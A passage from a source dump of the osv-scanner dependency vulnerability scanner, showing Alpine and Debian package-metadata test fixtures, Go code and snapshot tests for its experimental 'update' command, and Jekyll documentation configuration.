pkg:apk/alpine/alpine-baselayout-data@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout-data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 77824 alpine-baselayout Q1/JgpM8J6DWI/541tUX+uHEzSjqo= 11664 Natanael Copa <ncopa@alpinelinux.org> alpine-keys 2.4-r1 Public keys for Alpine Linux packages MIT cpe:2.3:a:alpine-keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* pkg:apk/alpine/alpine-keys@2.4-r1?arch=x86_64&upstream=alpine-keys&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_keys:2.4-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed aab68f8c9ab434a46710de8e12fb3206e2930a59 159744 alpine-keys Q1KM01lfKVp+gEZn23awujqjSkrN8= 13361 Natanael Copa <ncopa@alpinelinux.org> apk-tools 2.12.10-r1 Alpine Package Keeper - package manager for alpine GPL-2.0-only cpe:2.3:a:apk-tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* pkg:apk/alpine/apk-tools@2.12.10-r1?arch=x86_64&upstream=apk-tools&distro=alpine-3.17.2 https://gitlab.alpinelinux.org/alpine/apk-tools apkdb-cataloger ApkMetadata apk cpe:2.3:a:apk-tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk_tools:2.12.10-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 0188f510baadbae393472103427b9c1875117136 307200 apk-tools so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 120973 busybox 1.35.0 cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* binary-cataloger BinaryMetadata binary cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /bin/busybox Sören Tempel <soeren+alpine@soeren-tempel.net> busybox-binsh 1.36.1-r27 busybox ash /bin/sh GPL-2.0-only cpe:2.3:a:busybox-binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/busybox-binsh@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:busybox-binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 8192 busybox /bin/sh cmd:sh=1.36.1-r27 Q1miWwyhWKXVEiRYLhmArV1TKMs6A= busybox=1.36.1-r27 1547 Natanael Copa <ncopa@alpinelinux.org> ca-certificates-bundle 20220614-r4 Pre generated bundle of Mozilla certificates MPL-2.0 MIT cpe:2.3:a:ca-certificates-bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* pkg:apk/alpine/ca-certificates-bundle@20220614-r4?arch=x86_64&upstream=ca-certificates&distro=alpine-3.17.2 https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ca-certificates-bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e1839fd45a096c9e21ac24f8a61991d357d11628 237568 ca-certificates ca-certificates-cacert=20220614-r4 Q14PFUzkDXTGDcHkiuEdFuzb+EvxQ= 126296 Natanael Copa <ncopa@alpinelinux.org> libc-utils 0.7.2-r3 Meta package to pull in correct libc BSD-2-Clause BSD-3-Clause cpe:2.3:a:libc-utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* pkg:apk/alpine/libc-utils@0.7.2-r3?arch=x86_64&upstream=libc-dev&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:libc-utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_utils:0.7.2-r3:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 60424133be2e79bbfeff3d58147a22886f817ce2 4096 libc-dev Q19Gg06pBPiiG9UN94ql7qImsHSUQ= musl-utils 1485 Ariadne Conill <ariadne@dereferenced.org> libcrypto3 3.0.8-r0 Crypto library from openssl Apache-2.0 cpe:2.3:a:libcrypto3:libcrypto3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libcrypto3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 4206592 openssl so:libcrypto.so.3=3 Q1lyWpurYeMlLEt60ys+OlTABmzgs= so:libc.musl-x86_64.so.1 1710217 Ariadne Conill <ariadne@dereferenced.org> libssl3 3.0.8-r0 SSL shared libraries Apache-2.0 cpe:2.3:a:libssl3:libssl3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libssl3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 622592 openssl so:libssl.so.3=3 Q1Z6/d/FKYkPehWzNtOtYnJ74oIkY= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 246853 Timo Teräs <timo.teras@iki.fi> musl 1.2.3-r4 the musl c library (libc) implementation MIT cpe:2.3:a:musl:musl:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 634880 musl so:libc.musl-x86_64.so.1=1 Q1Pk7x1woArbB1nzkMPJPq1TECwus= 388955 Timo Teräs <timo.teras@iki.fi> musl-utils 1.2.3-r4 the musl c library (libc) implementation MIT BSD-2-Clause GPL-2.0-or-later cpe:2.3:a:musl-utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl-utils@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:musl-utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl_utils:1.2.3-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 135168 musl cmd:getconf=1.2.3-r4 cmd:getent=1.2.3-r4 cmd:iconv=1.2.3-r4 cmd:ldconfig=1.2.3-r4 cmd:ldd=1.2.3-r4 Q1ZWJL4eySx8nPSjF1FAJgQyvuNs4= scanelf so:libc.musl-x86_64.so.1 36697 Natanael Copa <ncopa@alpinelinux.org> scanelf 1.3.5-r1 Scan ELF binaries for stuff GPL-2.0-only cpe:2.3:a:scanelf:scanelf:1.3.5-r1:*:*:*:*:*:*:* pkg:apk/alpine/scanelf@1.3.5-r1?arch=x86_64&upstream=pax-utils&distro=alpine-3.17.2 https://wiki.gentoo.org/wiki/Hardened/PaX_Utilities apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e52243dbb02069f10d48440ccc5fd41fa5fc2236 98304 pax-utils cmd:scanelf=1.3.5-r1 Q11dxYFsHvBFAzzHGDo5gOTDNJDyQ= so:libc.musl-x86_64.so.1 37687 Sören Tempel <soeren+alpine@soeren-tempel.net> ssl_client 1.36.1-r27 EXternal ssl_client for busybox wget GPL-2.0-only cpe:2.3:a:ssl-client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/ssl_client@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ssl-client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl_client:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 28672 busybox cmd:ssl_client=1.36.1-r27 Q1QuqZjeP6XG85I29tOiCWofL8Cj0= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 4929 Natanael Copa <ncopa@alpinelinux.org> zlib 1.2.13-r0 A compression/decompression Library Zlib cpe:2.3:a:zlib:zlib:1.2.13-r0:*:*:*:*:*:*:* pkg:apk/alpine/zlib@1.2.13-r0?arch=x86_64&upstream=zlib&distro=alpine-3.17.2 https://zlib.net/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bb37266b06a72d21d1fd850ef4b86665cf9ef70f 110592 zlib so:libz.so.1=1.2.13 Q1rjnXT01l1PAxXheUxe4Oldl5rFk= so:libc.musl-x86_64.so.1 54258 alpine 3.17.2 Alpine Linux v3.17 https://gitlab.alpinelinux.org/alpine/aports/-/issues https://alpinelinux.org/ alpine Alpine Linux v3.17 3.17.2 ================================================ FILE: cmd/osv-scanner/testdata/locks-many/installed ================================================ C:Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= P:apk-tools V:2.12.10-r1 A:x86_64 S:120973 I:307200 T:Alpine Package Keeper - package manager for alpine U:https://gitlab.alpinelinux.org/alpine/apk-tools L:GPL-2.0-only o:apk-tools m:Natanael Copa t:1666552494 c:0188f510baadbae393472103427b9c1875117136 D:musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 p:so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 F:etc F:etc/apk F:etc/apk/keys F:etc/apk/protected_paths.d F:lib R:libapk.so.3.12.0 a:0:0:755 Z:Q1opjpYqXgzmOVo7EbNe8l5Xol08g= F:lib/apk F:lib/apk/exec F:sbin R:apk a:0:0:755 Z:Q1/4bmOPe/H1YhHRzlrj27oufThMw= F:var F:var/lib F:var/lib/apk ================================================ FILE: cmd/osv-scanner/testdata/locks-many/not-a-lockfile.toml ================================================ _="whatever this is, it's not a lockfile!" ================================================ FILE: cmd/osv-scanner/testdata/locks-many/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/testdata/locks-many/replace-local.mod ================================================ require ( golang.org/x/net v1.2.3 ) replace ( golang.org/x/net v1.2.3 => ./fork/net ) ================================================ FILE: cmd/osv-scanner/testdata/locks-many/status ================================================ Package: adduser Status: install ok installed Priority: important Section: admin Installed-Size: 849 Maintainer: redacted Architecture: all Multi-Arch: foreign Version: 3.118 Depends: passwd, debconf (>= 0.5) | debconf-2.0 Suggests: liblocale-gettext-perl, perl Conffiles: /etc/deluser.conf 773fb95e98a27947de4a95abb3d3f2a2 Description: add and remove users and groups This package includes the 'adduser' and 'deluser' commands for creating and removing users. . - 'adduser' creates new users and groups and adds existing users to existing groups; - 'deluser' removes users and groups and removes users from a given group. . Adding users with 'adduser' is much easier than adding them manually. Adduser will choose appropriate UID and GID values, create a home directory, copy skeletal user configuration, and automate setting initial values for the user's password, real name and so on. . Deluser can back up and remove users' home directories and mail spool or all the files they own on the system. . A custom script can be executed after each of the commands. ================================================ FILE: cmd/osv-scanner/testmain_test.go ================================================ package main import ( "log/slog" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/fix" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan" "github.com/google/osv-scanner/v2/cmd/osv-scanner/update" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { config.OSVScannerConfigName = "osv-scanner-test.toml" cleanupGitFixtures, err := testcmd.SetupGitFixtures() if err != nil { cleanupGitFixtures() panic(err) } slog.SetDefault(slog.New(testlogger.New())) testcmd.CommandsUnderTest = []cmd.CommandBuilder{ scan.Command, fix.Command, update.Command, } m.Run() cleanupGitFixtures() testutility.CleanSnapshots(m) } ================================================ FILE: cmd/osv-scanner/update/__snapshots__/command_test.snap ================================================ [TestCommand/errors_with_invalid_data_source - 1] --- [TestCommand/errors_with_invalid_data_source - 2] unsupported data-source "github" - must be one of: deps.dev, native --- [TestCommand/errors_with_invalid_data_source - 3] 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com UTF-8 1.7 1.7 4.12 com.fasterxml.jackson.core jackson-core 2.14.0 junit junit ${junit.version} test org.slf4j slf4j-migrator 2.0.0 some-profile org.apache.logging.log4j log4j-api 2.0 --- [TestCommand/file_does_not_exist - 1] --- [TestCommand/file_does_not_exist - 2] file not found: ./testdata/does_not_exist.xml --- [TestCommand/update_pom.xml_with_in-place_changes - 1] --- [TestCommand/update_pom.xml_with_in-place_changes - 2] --- [TestCommand/update_pom.xml_with_in-place_changes - 3] 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com UTF-8 1.7 1.7 4.13.2 com.fasterxml.jackson.core jackson-core 2.21.1 junit junit ${junit.version} test org.slf4j slf4j-migrator 2.1.0-alpha1 some-profile org.apache.logging.log4j log4j-api 3.0.0-beta2 --- [TestCommand/update_pom_with_in_place_changes_using_deps_dev_data_source - 1] --- [TestCommand/update_pom_with_in_place_changes_using_deps_dev_data_source - 2] --- [TestCommand/update_pom_with_in_place_changes_using_deps_dev_data_source - 3] 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com UTF-8 1.7 1.7 4.13.2 com.fasterxml.jackson.core jackson-core 2.21.1 junit junit ${junit.version} test org.slf4j slf4j-migrator 2.1.0-alpha1 some-profile org.apache.logging.log4j log4j-api 3.0.0-beta2 --- [TestCommand/update_pom_with_in_place_changes_using_native_data_source - 1] --- [TestCommand/update_pom_with_in_place_changes_using_native_data_source - 2] --- [TestCommand/update_pom_with_in_place_changes_using_native_data_source - 3] 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com UTF-8 1.7 1.7 4.13.2 com.fasterxml.jackson.core jackson-core 2.21.1 junit junit ${junit.version} test org.slf4j slf4j-migrator 2.1.0-alpha1 some-profile org.apache.logging.log4j log4j-api 3.0.0-beta2 --- [TestCommand/with_no_arguments - 1] NAME: osv-scanner update - [EXPERIMENTAL] scans a manifest file then updates dependencies USAGE: osv-scanner update OPTIONS: --manifest string, -M string path to manifest file (required) --ignore-dev whether to ignore development dependencies for updates --upgrade-config [package-name:]level [ --upgrade-config [package-name:]level ] the allowed package upgrades, in the format [package-name:]level. If package-name is omitted, level is applied to all packages. level must be one of (major, minor, patch, none). (default: major) --data-source string source to fetch package information from; value can be: deps.dev, native (default: "deps.dev") --help, -h show help --- [TestCommand/with_no_arguments - 2] Required flag "manifest" not set --- ================================================ FILE: cmd/osv-scanner/update/command.go ================================================ // Package update implements the `update` command for osv-scanner. package update import ( "context" "errors" "fmt" "io" "net/http" "os" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/depsdev" "github.com/google/osv-scanner/v2/internal/remediation/suggest" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/google/osv-scanner/v2/internal/resolution/depfile" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/version" "github.com/urfave/cli/v3" ) func Command(_, _ io.Writer, _ *http.Client) *cli.Command { return &cli.Command{ Hidden: true, Name: "update", Usage: "[EXPERIMENTAL] scans a manifest file then updates dependencies", Flags: []cli.Flag{ &cli.StringFlag{ Name: "manifest", Aliases: []string{"M"}, Usage: "path to manifest file (required)", TakesFile: true, Required: true, }, &cli.BoolFlag{ Name: "ignore-dev", Usage: "whether to ignore development dependencies for updates", }, &cli.StringSliceFlag{ Name: "upgrade-config", Usage: "the allowed package upgrades, in the format `[package-name:]level`. If package-name is omitted, level is applied to all packages. level must be one of (major, minor, patch, none).", DefaultText: "major", }, &cli.StringFlag{ Name: "data-source", Usage: "source to fetch package information from; value can be: deps.dev, native", Value: "deps.dev", Action: func(_ context.Context, _ *cli.Command, s string) error { if s != "deps.dev" && s != "native" { return fmt.Errorf("unsupported data-source \"%s\" - must be one of: deps.dev, native", s) } return nil }, }, }, Action: action, } } type updateOptions struct { Manifest string IgnoreDev bool UpgradeConfig upgrade.Config // Allowed upgrade levels per package. Client client.DependencyClient ManifestRW manifest.ReadWriter } func action(ctx context.Context, cmd *cli.Command) error { options := updateOptions{ Manifest: cmd.String("manifest"), IgnoreDev: cmd.Bool("ignore-dev"), UpgradeConfig: upgrade.ParseUpgradeConfig(cmd.StringSlice("upgrade-config")), } if _, err := os.Stat(options.Manifest); errors.Is(err, os.ErrNotExist) { return fmt.Errorf("file not found: %s", options.Manifest) } else if err != nil { return err } system := resolve.UnknownSystem if options.Manifest != "" { rw, err := manifest.GetReadWriter(options.Manifest, cmd.String("maven-registry")) if err != nil { return err } options.ManifestRW = rw system = rw.System() } var err error switch cmd.String("data-source") { case "deps.dev": options.Client, err = client.NewDepsDevClient(depsdev.DepsdevAPI, "osv-scanner_update/"+version.OSVVersion) if err != nil { return err } case "native": switch system { case resolve.Maven: options.Client, err = client.NewMavenRegistryClient(cmd.String("maven-registry")) if err != nil { return err } case resolve.NPM, resolve.UnknownSystem: fallthrough default: return fmt.Errorf("native data-source currently unsupported for %s ecosystem", system.String()) } } df, err := depfile.OpenLocalDepFile(options.Manifest) if err != nil { return err } mf, err := options.ManifestRW.Read(df) df.Close() // Close the dep file and we may re-open it for writing if err != nil { return err } suggester, err := suggest.GetSuggester(mf.System()) if err != nil { return err } patch, err := suggester.Suggest(ctx, options.Client, mf, suggest.Options{ IgnoreDev: options.IgnoreDev, UpgradeConfig: options.UpgradeConfig, }) if err != nil { return err } return manifest.Overwrite(options.ManifestRW, options.Manifest, patch) } ================================================ FILE: cmd/osv-scanner/update/command_test.go ================================================ package update_test import ( "os" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestCommand(t *testing.T) { t.Parallel() tests := []testcmd.Case{ { Name: "with_no_arguments", Args: []string{"", "update"}, Exit: 127, }, { Name: "update_pom.xml_with_in-place_changes", Args: []string{"", "update", "-M=./testdata/pom.xml"}, Exit: 0, }, { Name: "update_pom_with_in_place_changes_using_deps_dev_data_source", Args: []string{"", "update", "--data-source", "deps.dev", "-M", "./testdata/pom.xml"}, Exit: 0, }, { Name: "update_pom_with_in_place_changes_using_native_data_source", Args: []string{"", "update", "--data-source", "native", "-M", "./testdata/pom.xml"}, Exit: 0, }, { Name: "errors_with_invalid_data_source", Args: []string{"", "update", "--data-source", "github", "-M", "./testdata/pom.xml"}, Exit: 127, }, { Name: "file_does_not_exist", Args: []string{"", "update", "-M", "./testdata/does_not_exist.xml"}, Exit: 127, }, // TODO: add other test cases. } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() // Update action overwrites files, copy them to a temporary directory. testDir := testutility.CreateTestDir(t) manifest := testcmd.CopyFileFlagTo(t, tt, "-M", testDir) testcmd.RunAndMatchSnapshots(t, tt) if manifest != "" { b, err := os.ReadFile(manifest) if err != nil { t.Fatalf("could not read test file: %v", err) } testutility.NewSnapshot().WithCRLFReplacement().MatchText(t, string(b)) } }) } } ================================================ FILE: cmd/osv-scanner/update/testdata/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/update/testdata/pom.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com UTF-8 1.7 1.7 4.12 com.fasterxml.jackson.core jackson-core 2.14.0 junit junit ${junit.version} test org.slf4j slf4j-migrator 2.0.0 some-profile org.apache.logging.log4j log4j-api 2.0 ================================================ FILE: cmd/osv-scanner/update/testmain_test.go ================================================ package update_test import ( "log/slog" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/update" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { slog.SetDefault(slog.New(testlogger.New())) testcmd.CommandsUnderTest = []cmd.CommandBuilder{update.Command} m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: docs/.gitignore ================================================ _site .sass-cache .jekyll-cache .jekyll-metadata vendor ================================================ FILE: docs/404.html ================================================ --- permalink: /404.html layout: default ---

404

Page not found

The requested page could not be found.

================================================ FILE: docs/Gemfile ================================================ ruby "~> 3" source "https://rubygems.org" # Hello! This is where you manage which Jekyll version is used to run. # When you want to use a different version, change it below, save the # file and run `bundle install`. Run Jekyll with `bundle exec`, like so: # # bundle exec jekyll serve # # This will help ensure the proper Jekyll version is running. # Happy Jekylling! # gem "jekyll", "~> 4.3.2" # This is the default theme for new Jekyll sites. You may change this to anything you like. # If you want to use GitHub Pages, remove the "gem "jekyll"" above and # uncomment the line below. To upgrade, run `bundle update github-pages`. gem "github-pages", "~> 232", group: :jekyll_plugins # If you have any plugins, put them here! group :jekyll_plugins do gem "jekyll-feed", "~> 0.15" end # Windows and JRuby does not include zoneinfo files, so bundle the tzinfo-data gem # and associated library. platforms :mingw, :x64_mingw, :mswin, :jruby do gem "tzinfo", ">= 1", "< 3" gem "tzinfo-data" end # Performance-booster for watching directories on Windows gem "wdm", "~> 0.2.0", :platforms => [:mingw, :x64_mingw, :mswin] # Lock `http_parser.rb` gem to `v0.6.x` on JRuby builds since newer versions of the gem # do not have a Java counterpart. gem "http_parser.rb", "~> 0.8.0", :platforms => [:jruby] gem "webrick", "~> 1.7" ================================================ FILE: docs/README.md ================================================ # README The [OSV-Scanner docs](https://google.github.io/osv-scanner) are hosted on a [GitHub page](https://pages.github.com/). ## Running docs locally (docker) You can run the docs locally consistently through docker: ```bash docker build -t osv-scanner-docs -f docs.Dockerfile . docker run -p 4000:4000 osv-scanner-docs ``` ## Running docs locally (native) To run the docs locally, use : - Install `ruby (>= 3.1.0)`. This should come with `bundler`. - On Debian, you need to install them separately: - `ruby` - `ruby-bundler` - In this directory: - `bundle config set --local path 'vendor/bundle'` (you can skip this step if serving from this directory, as the config is already saved in `.bundle/config`) - `bundle install` - `bundle exec jekyll serve` Here's the full documentation on github for running the [docs locally]. [docs locally]: https://docs.github.com/en/pages/setting-up-a-github-pages-site-with-jekyll/testing-your-github-pages-site-locally-with-jekyll#building-your-site-locally ## Formatting docs We use [Prettier](https://prettier.io/) to standardize the format of markdown and config files. This requires [node/npm](https://docs.npmjs.com/downloading-and-installing-node-js-and-npm) to be installed. ### Running the formatter Run the following in the project directory: ```shell ./scripts/run_formatters.sh ``` ## Documentation theme We are using the [Just the Docs](https://just-the-docs.github.io/just-the-docs/) theme. ================================================ FILE: docs/_config.yml ================================================ # Welcome to Jekyll! # # This config file is meant for settings that affect your whole blog, values # which you are expected to set up once and rarely edit after that. If you find # yourself editing this file very often, consider using Jekyll's data files # feature for the data you need to update frequently. # # For technical reasons, this file is *NOT* reloaded automatically when you use # 'bundle exec jekyll serve'. If you change this file, please restart the server process. # # If you need help with YAML syntax, here are some quick references for you: # https://learn-the-web.algonquindesign.ca/topics/markdown-yaml-cheat-sheet/#yaml # https://learnxinyminutes.com/docs/yaml/ # # Site settings # These are used to personalize your new site. If you look in the HTML files, # you will see them accessed via {{ site.title }}, {{ site.email }}, and so on. # You can create any custom variable you would like, and they will be accessible # in the templates via {{ site.myvariable }}. title: OSV-Scanner description: >- # this means to ignore newlines until "baseurl:" Use OSV-Scanner to find existing vulnerabilities affecting your project's dependencies. baseurl: "/osv-scanner" # the subpath of your site, e.g. /blog url: "" # the base hostname & protocol for your site, e.g. http://example.com github_username: google ga_tracking: G-60SWD6J0TM # Build settings remote_theme: just-the-docs/just-the-docs plugins: - jekyll-feed color_scheme: custom_dark markdown: kramdown kramdown: toc_levels: 1..3 logo: "/assets/logo-dark.png" favicon_ico: "/assets/icon.png" callouts_level: quiet # or loud callouts: highlight: color: yellow important: title: Important color: blue new: title: New color: green note: title: Note color: purple warning: title: Warning color: red aux_links: "OSV-Scanner on GitHub": - https://github.com/google/osv-scanner nav_external_links: - title: OSV.dev url: https://osv.dev hide_icon: false # set to true to hide the external link icon - defaults to false - title: API docs url: https://osv.dev/docs/ hide_icon: false # set to true to hide the external link icon - defaults to false - title: OSV Schema url: https://ossf.github.io/osv-schema/ hide_icon: false # set to true to hide the external link icon - defaults to false # Exclude from processing. # The following items will not be processed, by default. # Any item listed under the `exclude:` key here will be automatically added to # the internal "default list". # # Excluded items can be processed by explicitly listing the directories or # their entries' file path in the `include:` list. # # exclude: # - .sass-cache/ # - .jekyll-cache/ # - gemfiles/ # - Gemfile # - Gemfile.lock # - node_modules/ # - vendor/bundle/ # - vendor/cache/ # - vendor/gems/ # - vendor/ruby/ ================================================ FILE: docs/_sass/color_schemes/_variables.scss ================================================ 